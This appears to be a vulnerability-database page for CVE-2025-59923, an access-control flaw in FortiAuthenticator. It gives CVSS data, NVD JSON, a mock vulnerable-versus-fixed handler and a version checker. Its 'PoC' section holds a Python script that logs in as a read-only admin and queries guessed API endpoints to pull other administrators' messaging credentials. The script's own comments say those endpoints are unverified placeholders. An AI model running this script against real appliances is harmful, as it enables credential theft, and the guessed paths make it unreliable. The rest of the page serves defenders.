Security Vulnerability Report
CVE-2025-59923 CVSS 2.7 LOW

CVE-2025-59923

Published: 2025-12-09 18:15:56
Last Modified: 2025-12-11 17:15:56

Description

An improper access control vulnerability in Fortinet FortiAuthenticator 6.6.0 through 6.6.6, FortiAuthenticator 6.5 all versions, FortiAuthenticator 6.4 all versions, FortiAuthenticator 6.3 all versions may allow an authenticated attacker with at least read-only admin permission to obtain the credentials of other administrators' messaging services via crafted requests.
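
The weakness class behind this CVE is CWE-284 (improper access control): an authenticated caller with the lowest admin role can retrieve a secret that belongs to another administrator. The following is an added illustration of that pattern in generic Python, not FortiAuthenticator code and not from the vendor advisory; the role names (`super`, `readonly`), the record fields and the function names are assumptions made for the example, and the sample credential records are constructed.

```python
# Added illustration of the weakness class (CWE-284, improper access control)
# described above: a read-only administrator obtaining another administrator's
# messaging-service credentials. This is a generic mock, not FortiAuthenticator
# code; the role names, record fields and function names are assumptions.
from dataclasses import dataclass


@dataclass(frozen=True)
class Admin:
    name: str
    role: str  # assumed role names: "super" or "readonly"


class Forbidden(Exception):
    """Raised when the requester may not read the requested record."""


# Constructed sample data: one messaging-service (e.g. SMS gateway) credential
# record per administrator, keyed by the owning admin's name.
MESSAGING_SERVICES = {
    "alice": {"gateway": "sms.example.com", "username": "alice-gw", "password": "S3cr3t-A"},
    "bob": {"gateway": "sms.example.net", "username": "bob-gw", "password": "S3cr3t-B"},
}


def get_messaging_service_vulnerable(requester: Admin, owner: str) -> dict:
    """Vulnerable pattern: the caller is authenticated (any admin role), but
    the handler never checks whether `requester` may read `owner`'s record,
    and it returns the stored secret verbatim. A read-only admin supplying
    another admin's identifier in a crafted request gets their password."""
    return dict(MESSAGING_SERVICES[owner])


def get_messaging_service_fixed(requester: Admin, owner: str) -> dict:
    """Hardened pattern: object-level authorization (you may read your own
    record, or you are a super admin) plus treating the password as
    write-only, so no read path ever echoes it back to anyone."""
    if requester.name != owner and requester.role != "super":
        raise Forbidden(f"{requester.name} ({requester.role}) may not read {owner}'s record")
    record = dict(MESSAGING_SERVICES[owner])
    record["password"] = "********"  # secret is write-only; never returned on read
    return record


if __name__ == "__main__":
    bob = Admin("bob", "readonly")
    print("vulnerable:", get_messaging_service_vulnerable(bob, "alice"))
    try:
        get_messaging_service_fixed(bob, "alice")
    except Forbidden as exc:
        print("fixed:", exc)
```

The two checks in the fixed handler are independent fixes: the ownership/role gate closes the horizontal access problem, and masking the stored secret on every read path limits the blast radius even if a future authorization bug reopens it.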

CVSS Details

CVSS Score: 2.7 (v3.1 base; exploitability 1.2, impact 1.4)
Severity: LOW
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:L/I:N/A:N

The low score follows from the prerequisites in the description: PR:H because a (read-only) administrator account is required, and C:L/I:N/A:N because the impact is limited to disclosure of other administrators' messaging-service credentials. Any further use of those credentials against the messaging services themselves is outside the scope of this score.

Configurations (Affected Products)

cpe:2.3:a:fortinet:fortiauthenticator:*:*:*:*:*:*:*:* - VULNERABLE
FortiAuthenticator 6.3 all versions
FortiAuthenticator 6.4 all versions
FortiAuthenticator 6.5 all versions
FortiAuthenticator 6.6.0 - 6.6.6

Note: the NVD cpeMatch entry for this CPE (see the raw JSON below) caps the affected range at versionEndIncluding 6.6.4, while the vendor description lists 6.6.0 through 6.6.6. A scanner keyed on the CPE range alone will report 6.6.5 and 6.6.6 as clean; confirm against the vendor advisory FG-IR-25-616 before closing a finding.
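
As an added example, not part of this page or of the vendor advisory, the following Python classifies a FortiAuthenticator version string against both affected ranges stated above (the vendor text and the NVD CPE match range), so that the 6.6.5/6.6.6 discrepancy is surfaced rather than silently reported clean. The accepted version-string formats (`major.minor[.patch]`, optional `v` prefix, optional `-build…` suffix) are an assumption of the example.

```python
# Added example (not part of the original page or the vendor advisory):
# classify a FortiAuthenticator version string against the CVE-2025-59923
# affected ranges quoted above. Accepting "major.minor[.patch]" with an
# optional "v" prefix and "-build" suffix is an assumption of this example.
import re
from typing import Tuple

# Vendor description: 6.3 all, 6.4 all, 6.5 all, 6.6.0 through 6.6.6 (inclusive).
# None means every patch level of that minor release is affected.
VENDOR_AFFECTED = {
    (6, 3): None,
    (6, 4): None,
    (6, 5): None,
    (6, 6): 6,
}

# NVD cpeMatch range (from the raw JSON on this page): 6.3.0 .. 6.6.4 inclusive.
NVD_CPE_RANGE = ((6, 3, 0), (6, 6, 4))


def parse_version(text: str) -> Tuple[int, int, int]:
    """Parse 'v6.6.5', '6.6.5-build0123' or '6.6' into (major, minor, patch)."""
    core = re.split(r"[-+ ]", text.strip().lstrip("vV"), maxsplit=1)[0]
    parts = core.split(".")
    if not 2 <= len(parts) <= 3 or not all(p.isdigit() for p in parts):
        raise ValueError(f"unrecognised version string: {text!r}")
    nums = [int(p) for p in parts] + [0] * (3 - len(parts))
    return nums[0], nums[1], nums[2]


def vendor_affected(text: str) -> bool:
    """True if the vendor's stated ranges cover this version."""
    major, minor, patch = parse_version(text)
    if (major, minor) not in VENDOR_AFFECTED:
        return False  # e.g. 6.2 or 7.x: not listed in the advisory text
    max_patch = VENDOR_AFFECTED[(major, minor)]
    return max_patch is None or patch <= max_patch


def nvd_cpe_matches(text: str) -> bool:
    """True if the NVD cpeMatch range (versionStartIncluding/EndIncluding) covers this version."""
    lo, hi = NVD_CPE_RANGE
    return lo <= parse_version(text) <= hi


def assess(text: str) -> str:
    """Reconcile both sources so 6.6.5 and 6.6.6 are not silently reported clean."""
    by_vendor, by_nvd = vendor_affected(text), nvd_cpe_matches(text)
    if by_vendor and by_nvd:
        return "affected"
    if by_vendor and not by_nvd:
        return "affected per vendor text; outside the NVD CPE range (6.6.4 cap)"
    return "not affected"


if __name__ == "__main__":
    for sample in ["v6.6.6-build0123", "6.6.4", "6.5", "6.6.7", "7.0.1"]:
        print(f"{sample:>18}: {assess(sample)}")
```

Versions not named in the advisory text (6.2 and earlier, 6.7 and later, 7.x) are reported as not affected only in the sense that this page gives no basis for flagging them; the vendor advisory is the place to confirm their status.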

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-59923 PoC - FortiAuthenticator Access Control Bypass
# Requires an authenticated session with read-only admin privileges.
# NOTE: the login path, the form field names and the API endpoint paths below
# are placeholders guessed by this script; nothing referenced on this page
# (including vendor advisory FG-IR-25-616) confirms them. Replace them with
# paths confirmed during authorized testing before relying on the output.
import json
import sys

import requests
import urllib3

# Appliances commonly present self-signed certificates; the warning is
# silenced because verify=False is used deliberately below.
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)

TARGET = "https://target-fortiauthenticator.example.com"
USERNAME = "readonly_admin"
PASSWORD = "password"


def login():
    """Authenticate and return a session holding the login cookie, or None."""
    session = requests.Session()
    login_url = f"{TARGET}/login"  # placeholder path
    data = {"username": USERNAME, "password": PASSWORD}  # placeholder field names
    response = session.post(login_url, data=data, verify=False, timeout=15)
    # A 200 alone does not prove authentication: many login forms return 200
    # with an error page. Require that a session cookie was set as well.
    if response.status_code == 200 and session.cookies:
        return session
    return None


def exploit(session):
    """Request messaging-service settings and keep any JSON bodies returned."""
    # Candidate endpoints; all are unverified placeholders (see note above).
    endpoints = [
        f"{TARGET}/api/v1/messaging/services",
        f"{TARGET}/api/v1/admin/messaging",
        f"{TARGET}/api/v1/settings/messaging",
    ]
    results = []
    for endpoint in endpoints:
        response = session.get(endpoint, verify=False, timeout=15)
        if response.status_code != 200:
            continue
        try:
            data = response.json()
        except ValueError:
            # HTML or other non-JSON body (e.g. a redirect back to the login page)
            continue
        results.append({"endpoint": endpoint, "data": data})
    return results


if __name__ == "__main__":
    session = login()
    if session is None:
        print("Authentication failed")
        sys.exit(1)
    print("Login successful, attempting exploitation...")
    creds = exploit(session)
    print(json.dumps(creds, indent=2))

References

https://fortiguard.fortinet.com/psirt/FG-IR-25-616 - Vendor Advisory (Fortinet PSIRT FG-IR-25-616)

Raw JSON Data

JSON
{
  "cve": {
    "id": "CVE-2025-59923",
    "sourceIdentifier": "[email protected]",
    "published": "2025-12-09T18:15:55.663",
    "lastModified": "2025-12-11T17:15:56.497",
    "vulnStatus": "Modified",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "An improper access control vulnerability in Fortinet FortiAuthenticator 6.6.0 through 6.6.6, FortiAuthenticator 6.5 all versions, FortiAuthenticator 6.4 all versions, FortiAuthenticator 6.3 all versions may allow an authenticated attacker with at least read-only admin permission to obtain the credentials of other administrators' messaging services via crafted requests."
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "[email protected]",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:L/I:N/A:N",
            "baseScore": 2.7,
            "baseSeverity": "LOW",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "HIGH",
            "userInteraction": "NONE",
            "scope": "UNCHANGED",
            "confidentialityImpact": "LOW",
            "integrityImpact": "NONE",
            "availabilityImpact": "NONE"
          },
          "exploitabilityScore": 1.2,
          "impactScore": 1.4
        }
      ]
    },
    "weaknesses": [
      {
        "source": "[email protected]",
        "type": "Secondary",
        "description": [
          {
            "lang": "en",
            "value": "CWE-284"
          }
        ]
      }
    ],
    "configurations": [
      {
        "nodes": [
          {
            "operator": "OR",
            "negate": false,
            "cpeMatch": [
              {
                "vulnerable": true,
                "criteria": "cpe:2.3:a:fortinet:fortiauthenticator:*:*:*:*:*:*:*:*",
                "versionStartIncluding": "6.3.0",
                "versionEndIncluding": "6.6.4",
                "matchCriteriaId": "AC1A8077-94C7-4F49-B819-5A19492C7509"
              }
            ]
          }
        ]
      }
    ],
    "references": [
      {
        "url": "https://fortiguard.fortinet.com/psirt/FG-IR-25-616",
        "source": "[email protected]",
        "tags": [
          "Vendor Advisory"
        ]
      }
    ]
  }
}